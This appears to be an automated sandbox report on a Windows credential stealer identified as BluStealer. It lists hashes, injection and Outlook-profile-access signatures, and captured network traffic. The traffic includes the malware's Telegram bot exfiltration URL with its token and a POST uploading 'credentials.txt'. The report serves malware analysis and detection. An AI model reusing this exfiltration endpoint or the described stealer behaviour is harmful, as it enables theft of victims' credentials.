Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2022 05:31
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
Resource
win10v2004-20221111-en
General
-
Target
SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
-
Size
1.2MB
-
MD5
7f7ef456450f254a7bbb162af495a3d2
-
SHA1
b957c8cc73f9cc83cf1519a628b2f8382d52befc
-
SHA256
02a4055e2fce4b14d2a07f2625c2329309c01dea5499294405ca78e1d800bd78
-
SHA512
a481c5de7cf000d30f6a28d4f8d6712295d6de062f64722ff264b423ae37d55dafba35676d63ed4ee68e465c1ce39082e4e48ad960f31a072d6c77f94bd731c6
-
SSDEEP
24576:wM+L74mBfNUstzoh04C14jT7cIxSFD075acQrFclsFVTJWR22n8W5enV3mmb3r8n:f+ejTBC05lQrF6sFVTJkj8W5enV3mOI
Malware Config
Extracted
blustealer
https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage?chat_id=1251788325
Signatures
-
BluStealer
A Modular information stealer written in Visual Basic.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AppLaunch.exe Key opened \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AppLaunch.exe Key opened \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AppLaunch.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3076 set thread context of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 4108 set thread context of 952 4108 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 58 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4108 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 3076 wrote to memory of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 3076 wrote to memory of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 3076 wrote to memory of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 3076 wrote to memory of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 3076 wrote to memory of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 3076 wrote to memory of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 3076 wrote to memory of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 3076 wrote to memory of 4108 3076 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 94 PID 4108 wrote to memory of 952 4108 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 96 PID 4108 wrote to memory of 952 4108 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 96 PID 4108 wrote to memory of 952 4108 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 96 PID 4108 wrote to memory of 952 4108 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 96 PID 4108 wrote to memory of 952 4108 SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AppLaunch.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AppLaunch.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe3⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:952
-
-
Network
-
Remote address:8.8.8.8:53Request151.122.125.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
POSThttps://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessageSecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exeRemote address:149.154.167.220:443RequestPOST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 167
Host: api.telegram.org
ResponseHTTP/1.1 200 OK
Date: Tue, 22 Nov 2022 05:32:17 GMT
Content-Type: application/json
Content-Length: 404
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
POSThttps://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\AdminSecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exeRemote address:149.154.167.220:443RequestPOST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: api.telegram.org
Content-Length: 201
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 400 Bad Request
Date: Tue, 22 Nov 2022 05:32:48 GMT
Content-Type: application/json
Content-Length: 81
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
Remote address:8.8.8.8:53Request2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestcrl.godaddy.comIN AResponsecrl.godaddy.comIN CNAMEgdcrl.godaddy.com.akadns.netgdcrl.godaddy.com.akadns.netIN A192.124.249.36gdcrl.godaddy.com.akadns.netIN A192.124.249.41gdcrl.godaddy.com.akadns.netIN A192.124.249.31
-
Remote address:192.124.249.31:80RequestGET /gdroot.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.godaddy.com
ResponseHTTP/1.1 200 OK
Date: Tue, 22 Nov 2022 05:33:15 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 429
Connection: keep-alive
X-Sucuri-ID: 19031
Last-Modified: Mon, 27 Jun 2022 22:00:33 GMT
ETag: "1ad-5e2750c919e0b"
Cache-Control: public, no-transform, must-revalidate
Expires: Wed, 29 Jun 2022 08:23:08 GMT
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Sucuri-Cache: HIT
Accept-Ranges: bytes
-
GEThttp://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3DSecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exeRemote address:192.124.249.41:80RequestGET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.godaddy.com
ResponseHTTP/1.1 200 OK
Date: Tue, 22 Nov 2022 05:33:21 GMT
Content-Type: application/ocsp-response
Content-Length: 1697
Connection: keep-alive
X-Sucuri-ID: 19041
Content-Transfer-Encoding: Binary
Cache-Control: public, no-transform, must-revalidate
Last-Modified: Mon, 21 Nov 2022 20:10:13 GMT
Expires: Tue, 22 Nov 2022 20:10:13 GMT
ETag: "18a2bef6d3bd326990faa7d41a031ae2978128cb"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Sucuri-Cache: HIT
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
149.154.167.220:443https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessagetls, httpSecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe1.3kB 7.1kB 11 11
HTTP Request
POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessageHTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admintls, httpSecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe1.7kB 6.7kB 14 11
HTTP Request
POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\AdminHTTP Response
400 -
260 B 5
-
260 B 5
-
260 B 5
-
192.124.249.31:80http://crl.godaddy.com/gdroot.crlhttpSecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe310 B 1.1kB 4 3
HTTP Request
GET http://crl.godaddy.com/gdroot.crlHTTP Response
200 -
192.124.249.41:80http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3DhttpSecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe404 B 2.4kB 4 4
HTTP Request
GET http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3DHTTP Response
200
-
73 B 159 B 1 1
DNS Request
151.122.125.40.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
api.telegram.org
DNS Response
149.154.167.220
-
118 B 204 B 1 1
DNS Request
2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
-
61 B 151 B 1 1
DNS Request
crl.godaddy.com
DNS Response
192.124.249.36192.124.249.41192.124.249.31